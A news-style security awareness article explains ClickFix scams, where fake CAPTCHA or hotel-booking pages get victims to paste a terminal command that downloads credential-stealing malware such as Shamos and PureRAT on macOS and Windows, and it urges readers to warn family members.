Over the past year, scammers have significantly ramped up a new method to infect computers of unsuspecting individuals. This increasingly prevalent tactic, which many potential victims remain unaware of, is rapid, bypasses most endpoint protections, and targets both macOS and Windows users. Known as ClickFix, this scheme often begins with an email from a hotel where the target has a pending registration, referencing accurate registration details. In other instances, ClickFix attacks may initiate through a WhatsApp message or even a URL appearing at the top of Google search results.
Once the target accesses the malicious site, they are confronted with a CAPTCHA challenge or another pretext that necessitates user confirmation. The user is then instructed to copy a string of text, open a terminal window, paste it, and hit Enter. Just one line of code is all it takes for the attacker to gain access. Upon execution, this string causes the PC or Mac to stealthily connect to a server controlled by the scammer and download malware without the user's knowledge. This leads to an infection typically involving credential-stealing malware.
Security firms report that ClickFix campaigns are proliferating at an alarming rate. The combination of low awareness regarding this technique, the fact that links often originate from recognized addresses or appear in search engine results, and the ability to evade certain endpoint protections are all contributing factors to this surge. Researchers from CrowdStrike noted, “This campaign highlights that leveraging malvertising and the one-line installation-command technique to distribute macOS information stealers remains popular among eCrime actors.”
One particular malware variant associated with this campaign is a credential-stealer identified as Shamos. Other malicious payloads include a fraudulent cryptocurrency wallet, software that allows the Mac to become part of a botnet, and modifications to macOS configurations that enable the malware to operate each time the machine restarts. Another campaign documented by Sekoia targeted Windows users by compromising hotel accounts on platforms like Booking.com. Attackers used the information from these accounts to contact individuals with pending reservations, fostering immediate trust among victims who may feel pressured to follow instructions to prevent cancellation.
Once victims engage with the malicious site, they encounter a fake CAPTCHA notification that closely resembles those from reputable content delivery networks like Cloudflare. The notification instructs users to copy a string of text and paste it into the Windows terminal. This action leads to an infection with malware known as PureRAT. Meanwhile, a ClickFix campaign reported by Push Security adapts its landing page based on the device being used, delivering tailored payloads for either Windows or macOS. Many of these payloads are categorized as LOLbins, which leverage native operating system capabilities to carry out attacks without writing malicious files to the disk, further complicating detection by endpoint protection tools.
The effectiveness of these attacks is amplified by a general lack of awareness. Over the years, users have become cautious about links in emails or messages, but this skepticism often does not extend to sites that instruct them to copy and paste text into an unfamiliar terminal. When such instructions come from emails tied to known hotels or appear at the top of Google results, victims can easily be caught off guard.
As families gather for various holiday celebrations in the coming weeks, it’s essential to inform loved ones about ClickFix scams, especially those who seek security advice. While tools like Microsoft Defender and other endpoint protection programs offer some level of defense, they can sometimes be bypassed. Therefore, increasing awareness remains the most effective countermeasure against these sophisticated scams.
